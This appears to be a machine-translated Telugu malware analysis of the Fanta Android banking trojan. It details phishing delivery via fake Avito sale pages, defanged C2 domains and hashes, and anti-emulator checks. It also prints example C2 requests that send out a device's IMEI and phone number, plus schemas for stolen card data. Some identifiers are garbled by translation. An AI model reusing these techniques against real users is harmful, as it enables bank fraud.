Leisya, Fanta: పాత Android ట్రోజన్ యొక్క కొత్త వ్యూహాలు

Leisya, Fanta: పాత Android ట్రోజన్ యొక్క కొత్త వ్యూహాలు

ఒక రోజు మీరు Avitoలో ఏదైనా విక్రయించాలనుకుంటున్నారు మరియు మీ ఉత్పత్తి యొక్క వివరణాత్మక వివరణను పోస్ట్ చేసిన తర్వాత (ఉదాహరణకు, RAM మాడ్యూల్), మీరు ఈ సందేశాన్ని అందుకుంటారు:

Leisya, Fanta: పాత Android ట్రోజన్ యొక్క కొత్త వ్యూహాలుమీరు లింక్‌ని తెరిచిన తర్వాత, మీరు సంతోషంగా మరియు విజయవంతమైన విక్రేత, కొనుగోలు చేసినట్లు మీకు తెలియజేసే హానికరం కాని పేజీని మీరు చూస్తారు:

Leisya, Fanta: పాత Android ట్రోజన్ యొక్క కొత్త వ్యూహాలు
మీరు "కొనసాగించు" బటన్‌ను క్లిక్ చేసిన తర్వాత, చిహ్నం మరియు నమ్మకాన్ని కలిగించే పేరుతో ఉన్న APK ఫైల్ మీ Android పరికరానికి డౌన్‌లోడ్ చేయబడుతుంది. మీరు కొన్ని కారణాల వలన యాక్సెసిబిలిటీ సర్వీస్ హక్కులను అభ్యర్థించిన అప్లికేషన్‌ను ఇన్‌స్టాల్ చేసారు, ఆపై రెండు విండోలు కనిపించాయి మరియు త్వరగా అదృశ్యమయ్యాయి మరియు... అంతే.

మీరు మీ బ్యాలెన్స్‌ని చెక్ చేయడానికి వెళతారు, కానీ కొన్ని కారణాల వల్ల మీ బ్యాంకింగ్ యాప్ మళ్లీ మీ కార్డ్ వివరాలను అడుగుతుంది. డేటాను నమోదు చేసిన తర్వాత, ఏదో భయంకరమైనది జరుగుతుంది: కొన్ని కారణాల వల్ల మీకు ఇంకా అస్పష్టంగా ఉంది, మీ ఖాతా నుండి డబ్బు అదృశ్యం కావడం ప్రారంభమవుతుంది. మీరు సమస్యను పరిష్కరించడానికి ప్రయత్నిస్తున్నారు, కానీ మీ ఫోన్ నిరోధిస్తుంది: ఇది "బ్యాక్" మరియు "హోమ్" కీలను నొక్కినప్పుడు, ఆఫ్ చేయదు మరియు ఎటువంటి భద్రతా చర్యలను సక్రియం చేయడానికి మిమ్మల్ని అనుమతించదు. ఫలితంగా, మీరు డబ్బు లేకుండా మిగిలిపోయారు, మీ వస్తువులు కొనుగోలు చేయబడలేదు, మీరు గందరగోళానికి గురవుతారు మరియు ఆశ్చర్యపోతున్నారు: ఏమి జరిగింది?

సమాధానం చాలా సులభం: మీరు ఫ్లెక్స్‌నెట్ కుటుంబ సభ్యుడైన ఆండ్రాయిడ్ ట్రోజన్ ఫాంటాకి బాధితురాలిగా మారారు. ఇది ఎలా జరిగింది? ఇప్పుడు వివరిస్తాము.

రచయితలు: ఆండ్రీ పోలోవింకిన్మాల్వేర్ విశ్లేషణలో జూనియర్ స్పెషలిస్ట్, ఇవాన్ పిసరేవ్మాల్వేర్ విశ్లేషణలో నిపుణుడు.

కొన్ని గణాంకాలు

ఆండ్రాయిడ్ ట్రోజన్‌ల ఫ్లెక్స్‌నెట్ కుటుంబం మొదట 2015లో తిరిగి తెలిసింది. చాలా సుదీర్ఘమైన కార్యకలాపాలలో, కుటుంబం అనేక ఉపజాతులకు విస్తరించింది: ఫాంటా, లైమ్‌బాట్, లిప్టన్, మొదలైనవి. ట్రోజన్, అలాగే దానితో అనుబంధించబడిన మౌలిక సదుపాయాలు ఇప్పటికీ నిలబడవు: కొత్త ప్రభావవంతమైన పంపిణీ పథకాలు అభివృద్ధి చేయబడుతున్నాయి - మా విషయంలో, అధిక-నాణ్యత ఫిషింగ్ పేజీలు నిర్దిష్ట వినియోగదారు-విక్రేతని లక్ష్యంగా చేసుకుంటాయి మరియు ట్రోజన్ డెవలపర్లు ఫ్యాషన్ పోకడలను అనుసరిస్తారు. వైరస్ రైటింగ్ - సోకిన పరికరాలు మరియు బైపాస్ ప్రొటెక్షన్ మెకానిజమ్‌ల నుండి మరింత సమర్ధవంతంగా డబ్బును దొంగిలించడం సాధ్యం చేసే కొత్త కార్యాచరణను జోడించడం.

ఈ కథనంలో వివరించిన ప్రచారం రష్యా నుండి వినియోగదారులను లక్ష్యంగా చేసుకుంది; ఉక్రెయిన్‌లో తక్కువ సంఖ్యలో సోకిన పరికరాలు నమోదు చేయబడ్డాయి మరియు కజాఖ్స్తాన్ మరియు బెలారస్‌లో కూడా తక్కువ.

Flexnet ఇప్పుడు 4 సంవత్సరాలకు పైగా Android ట్రోజన్ రంగంలో ఉన్నప్పటికీ మరియు అనేక మంది పరిశోధకులచే వివరంగా అధ్యయనం చేయబడినప్పటికీ, ఇది ఇప్పటికీ మంచి ఆకృతిలో ఉంది. జనవరి 2019 నుండి, నష్టం యొక్క సంభావ్య మొత్తం 35 మిలియన్ రూబిళ్లు కంటే ఎక్కువ - మరియు ఇది రష్యాలో ప్రచారాలకు మాత్రమే. 2015లో, ఈ ఆండ్రాయిడ్ ట్రోజన్ యొక్క వివిధ వెర్షన్‌లు భూగర్భ ఫోరమ్‌లలో విక్రయించబడ్డాయి, ఇక్కడ వివరణాత్మక వివరణతో ట్రోజన్ యొక్క సోర్స్ కోడ్ కూడా కనుగొనబడుతుంది. అంటే ప్రపంచంలోని నష్టం గణాంకాలు మరింత ఆకట్టుకున్నాయి. అటువంటి వృద్ధుడికి చెడ్డ సూచిక కాదు, కాదా?

Leisya, Fanta: పాత Android ట్రోజన్ యొక్క కొత్త వ్యూహాలు

అమ్మకం నుండి మోసం వరకు

ప్రకటనలు Avito కోసం ఇంటర్నెట్ సేవ కోసం ఫిషింగ్ పేజీ యొక్క గతంలో అందించిన స్క్రీన్‌షాట్ నుండి చూడవచ్చు, ఇది ఒక నిర్దిష్ట బాధితుడి కోసం తయారు చేయబడింది. స్పష్టంగా, దాడి చేసేవారు Avito యొక్క పార్సర్‌లలో ఒకదాన్ని ఉపయోగిస్తున్నారు, ఇది విక్రేత యొక్క ఫోన్ నంబర్ మరియు పేరు, అలాగే ఉత్పత్తి వివరణను సంగ్రహిస్తుంది. పేజీని విస్తరించిన తర్వాత మరియు APK ఫైల్‌ను సిద్ధం చేసిన తర్వాత, బాధితుడికి అతని పేరు మరియు అతని ఉత్పత్తి యొక్క వివరణ మరియు ఉత్పత్తి యొక్క "విక్రయం" నుండి పొందిన మొత్తంతో కూడిన ఫిషింగ్ పేజీకి లింక్‌తో SMS పంపబడుతుంది. బటన్‌పై క్లిక్ చేయడం ద్వారా, వినియోగదారు హానికరమైన APK ఫైల్‌ను అందుకుంటారు - ఫాంటా.

shcet491[.]ru డొమైన్ యొక్క అధ్యయనం అది Hostinger యొక్క DNS సర్వర్‌లకు అప్పగించబడిందని చూపింది:

  • ns1.hostinger.ru
  • ns2.hostinger.ru
  • ns3.hostinger.ru
  • ns4.hostinger.ru

డొమైన్ జోన్ ఫైల్‌లో IP చిరునామాలు 31.220.23[.]236, 31.220.23[.]243 మరియు 31.220.23[.]235కి సూచించే ఎంట్రీలు ఉన్నాయి. అయినప్పటికీ, డొమైన్ యొక్క ప్రాథమిక వనరు రికార్డు (A రికార్డ్) IP చిరునామా 178.132.1[.]240తో సర్వర్‌ను సూచిస్తుంది.

IP చిరునామా 178.132.1[.]240 నెదర్లాండ్స్‌లో ఉంది మరియు ఇది హోస్ట్‌కు చెందినది వరల్డ్ స్ట్రీమ్. IP చిరునామాలు 31.220.23[.]235, 31.220.23[.]236 మరియు 31.220.23[.]243 UKలో ఉన్నాయి మరియు భాగస్వామ్య హోస్టింగ్ సర్వర్ HOSTINGERకి చెందినవి. రికార్డర్‌గా ఉపయోగించబడుతుంది openprov-ru. కింది డొమైన్‌లు IP చిరునామా 178.132.1[.]240కి కూడా పరిష్కరించబడ్డాయి:

  • sdelka-ru[.]ru
  • tovar-av[.]ru
  • av-tovar[.]ru
  • ru-sdelka[.]ru
  • shcet382[.]ru
  • sdelka221[.]ru
  • sdelka211[.]ru
  • vyplata437[.]ru
  • విప్లత291[.]రు
  • perevod273[.]ru
  • perevod901[.]ru

కింది ఫార్మాట్‌లోని లింక్‌లు దాదాపు అన్ని డొమైన్‌ల నుండి అందుబాటులో ఉన్నాయని గమనించాలి:

http://(www.){0,1}<%domain%>/[0-9]{7}

ఈ టెంప్లేట్ SMS సందేశం నుండి లింక్‌ను కూడా కలిగి ఉంటుంది. చారిత్రక డేటా ఆధారంగా, ఒక డొమైన్ పైన వివరించిన నమూనాలోని అనేక లింక్‌లకు అనుగుణంగా ఉన్నట్లు కనుగొనబడింది, ఇది అనేక మంది బాధితులకు ట్రోజన్‌ను పంపిణీ చేయడానికి ఒక డొమైన్ ఉపయోగించబడిందని సూచిస్తుంది.

కొంచెం ముందుకు వెళ్దాం: SMS నుండి లింక్ ద్వారా డౌన్‌లోడ్ చేయబడిన ట్రోజన్ చిరునామాను నియంత్రణ సర్వర్‌గా ఉపయోగిస్తుంది onusedseddohap[.]club. ఈ డొమైన్ 2019-03-12న రిజిస్టర్ చేయబడింది మరియు 2019-04-29 నుండి APK అప్లికేషన్‌లు ఈ డొమైన్‌తో ఇంటరాక్ట్ అవుతాయి. VirusTotal నుండి పొందిన డేటా ఆధారంగా, మొత్తం 109 అప్లికేషన్‌లు ఈ సర్వర్‌తో పరస్పర చర్య చేశాయి. డొమైన్ స్వయంగా IP చిరునామాకు పరిష్కరించబడింది 217.23.14[.]27, నెదర్లాండ్స్‌లో ఉంది మరియు హోస్టర్ యాజమాన్యంలో ఉంది వరల్డ్ స్ట్రీమ్. రికార్డర్‌గా ఉపయోగించబడుతుంది NameCheap. డొమైన్‌లు కూడా ఈ IP చిరునామాకు పరిష్కరించబడ్డాయి చెడ్డ-రాకూన్[.]క్లబ్ (2018-09-25 నుండి ప్రారంభమవుతుంది) మరియు బాడ్-రాకూన్[.]లైవ్ (2018-10-25 నుండి ప్రారంభమవుతుంది). డొమైన్‌తో చెడ్డ-రాకూన్[.]క్లబ్ 80 కంటే ఎక్కువ APK ఫైల్‌లు ఇంటరాక్ట్ చేయబడ్డాయి బాడ్-రాకూన్[.]లైవ్ - 100 కంటే ఎక్కువ.

సాధారణంగా, దాడి క్రింది విధంగా కొనసాగుతుంది:

Leisya, Fanta: పాత Android ట్రోజన్ యొక్క కొత్త వ్యూహాలు

ఫాంటా మూత కింద ఏముంది?

అనేక ఇతర ఆండ్రాయిడ్ ట్రోజన్‌ల మాదిరిగానే, ఫాంటా SMS సందేశాలను చదవడం మరియు పంపడం, USSD అభ్యర్థనలు చేయడం మరియు అప్లికేషన్‌ల పైన (బ్యాంకింగ్ వాటితో సహా) దాని స్వంత విండోలను ప్రదర్శించగలదు. అయినప్పటికీ, ఈ కుటుంబం యొక్క కార్యాచరణ యొక్క ఆర్సెనల్ వచ్చింది: ఫాంటా ఉపయోగించడం ప్రారంభించింది యాక్సెసిబిలిటీ సర్వీస్ వివిధ ప్రయోజనాల కోసం: ఇతర అప్లికేషన్‌ల నుండి నోటిఫికేషన్‌ల కంటెంట్‌లను చదవడం, సోకిన పరికరంలో ట్రోజన్‌ను గుర్తించడాన్ని నిరోధించడం మరియు అమలు చేయడాన్ని ఆపడం మొదలైనవి. ఫాంటా ఆండ్రాయిడ్ యొక్క అన్ని వెర్షన్‌లలో 4.4 కంటే తక్కువ వయస్సు లేకుండా పనిచేస్తుంది. ఈ వ్యాసంలో మేము ఈ క్రింది ఫాంటా నమూనాను నిశితంగా పరిశీలిస్తాము:

  • MD5: 0826bd11b2c130c4c8ac137e395ac2d4
  • SHA1: ac33d38d486ee4859aa21b9aeba5e6e11404bcc8
  • SHA256: df57b7e7ac6913ea5f4daad319e02db1f4a6b243f2ea6500f83060648da6edfb

ప్రారంభించిన వెంటనే

ప్రారంభించిన వెంటనే, ట్రోజన్ దాని చిహ్నాన్ని దాచిపెడుతుంది. సోకిన పరికరం పేరు జాబితాలో లేకుంటే మాత్రమే అప్లికేషన్ పని చేస్తుంది:

  • android_x86
  • VirtualBox
  • Nexus 5X(బుల్‌హెడ్)
  • Nexus 5(రేజర్)

ఈ చెక్ ట్రోజన్ యొక్క ప్రధాన సేవలో నిర్వహించబడుతుంది - ప్రధాన సేవ. మొదటిసారి ప్రారంభించినప్పుడు, అప్లికేషన్ యొక్క కాన్ఫిగరేషన్ పారామితులు డిఫాల్ట్ విలువలకు ప్రారంభించబడతాయి (కాన్ఫిగరేషన్ డేటాను నిల్వ చేసే ఫార్మాట్ మరియు వాటి అర్థం తరువాత చర్చించబడతాయి), మరియు కొత్త సోకిన పరికరం నియంత్రణ సర్వర్‌లో నమోదు చేయబడుతుంది. సందేశ రకంతో HTTP POST అభ్యర్థన సర్వర్‌కు పంపబడుతుంది రిజిస్టర్_బోట్ మరియు సోకిన పరికరం గురించి సమాచారం (Android వెర్షన్, IMEI, ఫోన్ నంబర్, ఆపరేటర్ పేరు మరియు ఆపరేటర్ నమోదు చేయబడిన దేశం కోడ్). చిరునామా నియంత్రణ సర్వర్‌గా పనిచేస్తుంది hXXp://onuseseddohap[.]club/controller.php. ప్రతిస్పందనగా, సర్వర్ ఫీల్డ్‌లను కలిగి ఉన్న సందేశాన్ని పంపుతుంది bot_id, bot_pwd, సర్వర్ - అప్లికేషన్ ఈ విలువలను CnC సర్వర్ యొక్క పారామితులుగా సేవ్ చేస్తుంది. పరామితి సర్వర్ ఫీల్డ్ అందకపోతే ఐచ్ఛికం: ఫాంటా రిజిస్ట్రేషన్ చిరునామాను ఉపయోగిస్తుంది - hXXp://onuseseddohap[.]club/controller.php. CnC చిరునామాను మార్చే పనిని రెండు సమస్యలను పరిష్కరించడానికి ఉపయోగించవచ్చు: అనేక సర్వర్‌ల మధ్య లోడ్‌ను సమానంగా పంపిణీ చేయడానికి (అధిక సంఖ్యలో సోకిన పరికరాలతో, ఆప్టిమైజ్ చేయని వెబ్ సర్వర్‌లో లోడ్ ఎక్కువగా ఉంటుంది) మరియు ప్రత్యామ్నాయాన్ని కూడా ఉపయోగించవచ్చు. CnC సర్వర్‌లలో ఒకటి విఫలమైన సందర్భంలో సర్వర్.

అభ్యర్థనను పంపుతున్నప్పుడు లోపం సంభవించినట్లయితే, ట్రోజన్ 20 సెకన్ల తర్వాత నమోదు ప్రక్రియను పునరావృతం చేస్తుంది.

పరికరం విజయవంతంగా నమోదు చేయబడిన తర్వాత, ఫాంటా వినియోగదారుకు క్రింది సందేశాన్ని ప్రదర్శిస్తుంది:

Leisya, Fanta: పాత Android ట్రోజన్ యొక్క కొత్త వ్యూహాలు
ముఖ్యమైన గమనిక: సేవ అని పిలుస్తారు సిస్టమ్ సెక్యూరిటీ - ట్రోజన్ సేవ పేరు, మరియు బటన్‌ను క్లిక్ చేసిన తర్వాత సరే సోకిన పరికరం యొక్క యాక్సెసిబిలిటీ సెట్టింగ్‌లతో విండో తెరవబడుతుంది, ఇక్కడ వినియోగదారు తప్పనిసరిగా హానికరమైన సేవ కోసం ప్రాప్యత హక్కులను మంజూరు చేయాలి:

Leisya, Fanta: పాత Android ట్రోజన్ యొక్క కొత్త వ్యూహాలు
యూజర్ ఆన్ చేసిన వెంటనే యాక్సెసిబిలిటీ సర్వీస్, ఫాంటా అప్లికేషన్ విండోస్ యొక్క కంటెంట్‌లకు మరియు వాటిలో చేసే చర్యలకు యాక్సెస్ పొందుతుంది:

Leisya, Fanta: పాత Android ట్రోజన్ యొక్క కొత్త వ్యూహాలు
యాక్సెసిబిలిటీ హక్కులను పొందిన వెంటనే, ట్రోజన్ నోటిఫికేషన్‌లను చదవడానికి నిర్వాహక హక్కులు మరియు హక్కులను అభ్యర్థిస్తుంది:

Leisya, Fanta: పాత Android ట్రోజన్ యొక్క కొత్త వ్యూహాలు
యాక్సెసిబిలిటీ సర్వీస్‌ని ఉపయోగించి, అప్లికేషన్ కీస్ట్రోక్‌లను అనుకరిస్తుంది, తద్వారా అవసరమైన అన్ని హక్కులను ఇస్తుంది.

Fanta కాన్ఫిగరేషన్ డేటాను నిల్వ చేయడానికి అవసరమైన బహుళ డేటాబేస్ ఉదంతాలను (తరువాత వివరించబడుతుంది) సృష్టిస్తుంది, అలాగే సోకిన పరికరం గురించి ప్రక్రియలో సేకరించిన సమాచారం. సేకరించిన సమాచారాన్ని పంపడానికి, ట్రోజన్ డేటాబేస్ నుండి ఫీల్డ్‌లను డౌన్‌లోడ్ చేయడానికి మరియు నియంత్రణ సర్వర్ నుండి ఆదేశాన్ని స్వీకరించడానికి రూపొందించిన పునరావృత విధిని సృష్టిస్తుంది. CnCని యాక్సెస్ చేయడానికి విరామం Android సంస్కరణపై ఆధారపడి సెట్ చేయబడింది: 5.1 విషయంలో, విరామం 10 సెకన్లు, లేకపోతే 60 సెకన్లు.

ఆదేశాన్ని స్వీకరించడానికి, ఫాంటా ఒక అభ్యర్థన చేస్తుంది GetTask నిర్వహణ సర్వర్‌కు. ప్రతిస్పందనగా, CnC కింది ఆదేశాలలో ఒకదాన్ని పంపగలదు:

జట్టు వివరణ
0 SMS సందేశాన్ని పంపండి
1 ఫోన్ కాల్ లేదా USSD కమాండ్ చేయండి
2 పారామీటర్‌ను అప్‌డేట్ చేస్తుంది విరామం
3 పారామీటర్‌ను అప్‌డేట్ చేస్తుంది అడ్డుకొనే
6 పారామీటర్‌ను అప్‌డేట్ చేస్తుంది smsManager
9 SMS సందేశాలను సేకరించడం ప్రారంభించండి
11 మీ ఫోన్‌ని ఫ్యాక్టరీ సెట్టింగ్‌లకు రీసెట్ చేయండి
12 డైలాగ్ బాక్స్ సృష్టి యొక్క లాగింగ్‌ను ప్రారంభించండి/నిలిపివేయండి

ఫాంటా 70 బ్యాంకింగ్ యాప్‌లు, ఫాస్ట్ పేమెంట్ సిస్టమ్‌లు మరియు ఇ-వాలెట్‌ల నుండి నోటిఫికేషన్‌లను కూడా సేకరిస్తుంది మరియు వాటిని డేటాబేస్‌లో నిల్వ చేస్తుంది.

కాన్ఫిగరేషన్ పారామితులను నిల్వ చేస్తోంది

కాన్ఫిగరేషన్ పారామితులను నిల్వ చేయడానికి, Fanta Android ప్లాట్‌ఫారమ్ కోసం ప్రామాణిక విధానాన్ని ఉపయోగిస్తుంది - ప్రాధాన్యతలు-ఫైళ్లు. అనే ఫైల్‌లో సెట్టింగ్‌లు సేవ్ చేయబడతాయి సెట్టింగులు. సేవ్ చేయబడిన పారామితుల వివరణ క్రింది పట్టికలో ఉంది.

పేరు డిఫాల్ట్ విలువ సాధ్యమయ్యే విలువలు వివరణ
id 0 పూర్ణ సంఖ్య బోట్ ID
సర్వర్ hXXp://onuseseddohap[.]club/ URL సర్వర్ చిరునామాను నియంత్రించండి
pwd - స్ట్రింగ్ సర్వర్ పాస్వర్డ్
విరామం 20 పూర్ణ సంఖ్య సమయ విరామం. కింది పనులను ఎంతకాలం వాయిదా వేయాలో సూచిస్తుంది:

  • పంపిన SMS సందేశం యొక్క స్థితి గురించి అభ్యర్థనను పంపుతున్నప్పుడు
  • నిర్వహణ సర్వర్ నుండి కొత్త ఆదేశాన్ని స్వీకరించడం

అడ్డుకొనే అన్ని అన్నీ/టెల్ నంబర్ ఫీల్డ్ స్ట్రింగ్‌తో సమానంగా ఉంటే అన్ని లేదా టెలి నంబర్, అప్పుడు అందుకున్న SMS సందేశం అప్లికేషన్ ద్వారా అడ్డగించబడుతుంది మరియు వినియోగదారుకు చూపబడదు
smsManager 0 0/1 డిఫాల్ట్ SMS గ్రహీతగా అప్లికేషన్‌ను ప్రారంభించండి/నిలిపివేయండి
డైలాగ్ చదవండి తప్పుడు ఒప్పు తప్పు ఈవెంట్ లాగింగ్‌ని ఎనేబుల్/డిజేబుల్ చేయండి యాక్సెసిబిలిటీ ఈవెంట్

ఫాంటా ఫైల్‌ను కూడా ఉపయోగిస్తుంది smsManager:

పేరు డిఫాల్ట్ విలువ సాధ్యమయ్యే విలువలు వివరణ
pckg - స్ట్రింగ్ SMS సందేశ నిర్వాహకుడి పేరు ఉపయోగించబడింది

డేటాబేస్‌లతో పరస్పర చర్య

దాని ఆపరేషన్ సమయంలో, ట్రోజన్ రెండు డేటాబేస్‌లను ఉపయోగిస్తుంది. డేటాబేస్ పేరు పెట్టబడింది a ఫోన్ నుండి సేకరించిన వివిధ సమాచారాన్ని నిల్వ చేయడానికి ఉపయోగిస్తారు. రెండవ డేటాబేస్ పేరు పెట్టబడింది fanta.db మరియు బ్యాంక్ కార్డ్‌ల గురించి సమాచారాన్ని సేకరించడానికి రూపొందించబడిన ఫిషింగ్ విండోలను రూపొందించడానికి బాధ్యత వహించే సెట్టింగ్‌లను సేవ్ చేయడానికి ఉపయోగించబడుతుంది.

ట్రోజన్ డేటాబేస్ను ఉపయోగిస్తుంది а సేకరించిన సమాచారాన్ని నిల్వ చేయడానికి మరియు మీ చర్యలను లాగ్ చేయడానికి. డేటా పట్టికలో నిల్వ చేయబడుతుంది చిట్టాలు. పట్టికను సృష్టించడానికి, క్రింది SQL ప్రశ్నను ఉపయోగించండి:

create table logs ( _id integer primary key autoincrement, d TEXT, f TEXT, p TEXT, m integer)

డేటాబేస్ కింది సమాచారాన్ని కలిగి ఉంది:

1. సోకిన పరికరం యొక్క ప్రారంభాన్ని సందేశంతో లాగ్ చేయడం ఫోన్ ఆన్ అయింది!

2. అప్లికేషన్ల నుండి నోటిఫికేషన్లు. కింది టెంప్లేట్ ప్రకారం సందేశం రూపొందించబడింది:

(<%App Name%>)<%Title%>: <%Notification text%>

3. ట్రోజన్ సృష్టించిన ఫిషింగ్ ఫారమ్‌ల నుండి బ్యాంక్ కార్డ్ డేటా. పరామితి VIEW_NAME కింది వాటిలో ఒకటి కావచ్చు:

  • AliExpress
  • Avito
  • Google ప్లే
  • ఇతర <%యాప్ పేరు%>

సందేశం ఫార్మాట్‌లో లాగిన్ చేయబడింది:

[<%Time in format HH:mm:ss dd.MM.yyyy%>](<%VIEW_NAME%>) Номер карты:<%CARD_NUMBER%>; Дата:<%MONTH%>/<%YEAR%>; CVV: <%CVV%>

4. ఫార్మాట్‌లో ఇన్‌కమింగ్/అవుట్‌గోయింగ్ SMS సందేశాలు:

([<%Time in format HH:mm:ss dd.MM.yyyy%>] Тип: Входящее/Исходящее) <%Mobile number%>:<%SMS-text%>

5. ఫార్మాట్‌లో డైలాగ్ బాక్స్‌ను సృష్టించే ప్యాకేజీ గురించి సమాచారం:

(<%Package name%>)<%Package information%>

ఉదాహరణ పట్టిక చిట్టాలు:

Leisya, Fanta: పాత Android ట్రోజన్ యొక్క కొత్త వ్యూహాలు
ఫాంటా యొక్క కార్యాచరణలో ఒకటి బ్యాంక్ కార్డుల గురించి సమాచారాన్ని సేకరించడం. బ్యాంకింగ్ అప్లికేషన్‌లను తెరిచేటప్పుడు ఫిషింగ్ విండోలను సృష్టించడం ద్వారా డేటా సేకరణ జరుగుతుంది. ట్రోజన్ ఒక్కసారి మాత్రమే ఫిషింగ్ విండోను సృష్టిస్తుంది. వినియోగదారుకు విండో చూపబడిన సమాచారం పట్టికలో నిల్వ చేయబడుతుంది సెట్టింగులు డేటాబేస్లో fanta.db. డేటాబేస్ సృష్టించడానికి, క్రింది SQL ప్రశ్నను ఉపయోగించండి:

create table settings (can_login integer, first_bank integer, can_alpha integer, can_avito integer, can_ali integer, can_vtb24 integer, can_telecard integer, can_another integer, can_card integer);

అన్ని టేబుల్ ఫీల్డ్‌లు సెట్టింగులు డిఫాల్ట్‌గా 1కి ప్రారంభించబడింది (ఫిషింగ్ విండోను సృష్టించండి). వినియోగదారు వారి డేటాను నమోదు చేసిన తర్వాత, విలువ 0కి సెట్ చేయబడుతుంది. పట్టిక ఫీల్డ్‌ల ఉదాహరణ సెట్టింగులు:

  • లాగిన్_ చేయవచ్చు — బ్యాంకింగ్ అప్లికేషన్‌ను తెరిచేటప్పుడు ఫారమ్‌ను ప్రదర్శించడానికి ఫీల్డ్ బాధ్యత వహిస్తుంది
  • మొదటి_బ్యాంక్ - ఉపయోగం లో లేదు
  • చెయ్యవచ్చు_అవిటో — Avito అప్లికేషన్‌ను తెరిచేటప్పుడు ఫారమ్‌ను ప్రదర్శించడానికి ఫీల్డ్ బాధ్యత వహిస్తుంది
  • చెయ్యవచ్చు_అలీ - Aliexpress అప్లికేషన్‌ను తెరిచేటప్పుడు ఫారమ్‌ను ప్రదర్శించడానికి ఫీల్డ్ బాధ్యత వహిస్తుంది
  • చెయ్యవచ్చు_మరొకటి - జాబితా నుండి ఏదైనా అప్లికేషన్‌ను తెరిచేటప్పుడు ఫారమ్‌ను ప్రదర్శించడానికి ఫీల్డ్ బాధ్యత వహిస్తుంది: యులా, పాండావో, డ్రోమ్ ఆటో, వాలెట్. డిస్కౌంట్ మరియు బోనస్ కార్డ్‌లు, Aviasales, బుకింగ్, Trivago
  • చెయ్యవచ్చు_కార్డు — ఫీల్డ్ తెరచినప్పుడు ఫారమ్‌ను ప్రదర్శించడానికి బాధ్యత వహిస్తుంది Google ప్లే

నిర్వహణ సర్వర్‌తో పరస్పర చర్య

నిర్వహణ సర్వర్‌తో నెట్‌వర్క్ పరస్పర చర్య HTTP ప్రోటోకాల్ ద్వారా జరుగుతుంది. నెట్‌వర్క్‌తో పని చేయడానికి, ఫాంటా జనాదరణ పొందిన రెట్రోఫిట్ లైబ్రరీని ఉపయోగిస్తుంది. అభ్యర్థనలు వీరికి పంపబడ్డాయి: hXXp://onuseseddohap[.]club/controller.php. సర్వర్‌లో నమోదు చేసేటప్పుడు సర్వర్ చిరునామాను మార్చవచ్చు. సర్వర్ నుండి ప్రతిస్పందనగా కుక్కీలు పంపబడవచ్చు. ఫాంటా సర్వర్‌కి క్రింది అభ్యర్థనలను చేస్తుంది:

  • నియంత్రణ సర్వర్‌లో బాట్ యొక్క నమోదు మొదటిసారిగా ప్రారంభించిన తర్వాత ఒకసారి జరుగుతుంది. సోకిన పరికరం గురించిన కింది డేటా సర్వర్‌కు పంపబడుతుంది:
    · కుకీ — సర్వర్ నుండి అందుకున్న కుక్కీలు (డిఫాల్ట్ విలువ ఖాళీ స్ట్రింగ్)
    · మోడ్ - స్ట్రింగ్ స్థిరాంకం రిజిస్టర్_బోట్
    · ఉపసర్గ - పూర్ణాంక స్థిరాంకం 2
    · వెర్షన్_sdk - కింది టెంప్లేట్ ప్రకారం ఏర్పడుతుంది: <%Build.MODEL%>/<%Build.VERSION.RELEASE%>(Avit)
    · IMEI - సోకిన పరికరం యొక్క IMEI
    · దేశంలో — ISO ఆకృతిలో ఆపరేటర్ నమోదు చేయబడిన దేశం యొక్క కోడ్
    · సంఖ్య - ఫోను నంబరు
    · ఆపరేటర్లు - ఆపరేటర్ పేరు

    సర్వర్‌కు పంపిన అభ్యర్థనకు ఉదాహరణ:

    POST /controller.php HTTP/1.1
    Cookie:
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 144
    Host: onuseseddohap.club
    Connection: close
    Accept-Encoding: gzip, deflate
    User-Agent: okhttp/3.6.0
    
    mode=register_bot&prefix=2&version_sdk=<%VERSION_SDK%>&imei=<%IMEI%>&country=<%COUNTRY_ISO%>&number=<%TEL_NUMBER%>&operator=<%OPERATOR_NAME%>
    

    అభ్యర్థనకు ప్రతిస్పందనగా, సర్వర్ తప్పనిసరిగా కింది పారామితులను కలిగి ఉన్న JSON ఆబ్జెక్ట్‌ను తిరిగి అందించాలి:
    · bot_id - సోకిన పరికరం యొక్క ID. bot_id 0కి సమానం అయితే, ఫాంటా అభ్యర్థనను మళ్లీ అమలు చేస్తుంది.
    bot_pwd — సర్వర్ కోసం పాస్వర్డ్.
    సర్వర్ - సర్వర్ చిరునామాను నియంత్రించండి. ఐచ్ఛిక పరామితి. పరామితి పేర్కొనబడకపోతే, అప్లికేషన్‌లో సేవ్ చేయబడిన చిరునామా ఉపయోగించబడుతుంది.

    ఉదాహరణ JSON వస్తువు:

    {
        "response":[
       	 {
       		 "bot_id": <%BOT_ID%>,
       		 "bot_pwd": <%BOT_PWD%>,
       		 "server": <%SERVER%>
       	 }
        ],
        "status":"ok"
    }

  • సర్వర్ నుండి ఆదేశాన్ని స్వీకరించడానికి అభ్యర్థన. కింది డేటా సర్వర్‌కు పంపబడుతుంది:
    · కుకీ - సర్వర్ నుండి అందుకున్న కుక్కీలు
    · బిడ్ - అభ్యర్థనను పంపుతున్నప్పుడు స్వీకరించబడిన సోకిన పరికరం యొక్క id రిజిస్టర్_బోట్
    · pwd - సర్వర్ కోసం పాస్వర్డ్
    · divice_admin - అడ్మినిస్ట్రేటర్ హక్కులు పొందబడ్డాయో లేదో ఫీల్డ్ నిర్ణయిస్తుంది. నిర్వాహక హక్కులు పొందినట్లయితే, ఫీల్డ్ సమానంగా ఉంటుంది 1, లేకపోతే 0
    · సౌలభ్యాన్ని — యాక్సెసిబిలిటీ సర్వీస్ ఆపరేషన్ స్థితి. సేవ ప్రారంభించబడితే, దాని విలువ 1, లేకపోతే 0
    · SMS మేనేజర్ — SMSను స్వీకరించడానికి ట్రోజన్ డిఫాల్ట్ అప్లికేషన్‌గా ప్రారంభించబడిందో లేదో చూపిస్తుంది
    · స్క్రీన్ - స్క్రీన్ ఏ స్థితిలో ఉందో ప్రదర్శిస్తుంది. విలువ సెట్ చేయబడుతుంది 1, స్క్రీన్ ఆన్‌లో ఉంటే, లేకపోతే 0;

    సర్వర్‌కు పంపిన అభ్యర్థనకు ఉదాహరణ:

    POST /controller.php HTTP/1.1
    Cookie:
    Content-Type: application/x-www-form-urlencoded
    Host: onuseseddohap.club
    Connection: close
    Accept-Encoding: gzip, deflate
    User-Agent: okhttp/3.6.0
    
    mode=getTask&bid=<%BID%>&pwd=<%PWD%>&divice_admin=<%DEV_ADM%>&Accessibility=<%ACCSBL%>&SMSManager=<%SMSMNG%>&screen=<%SCRN%>

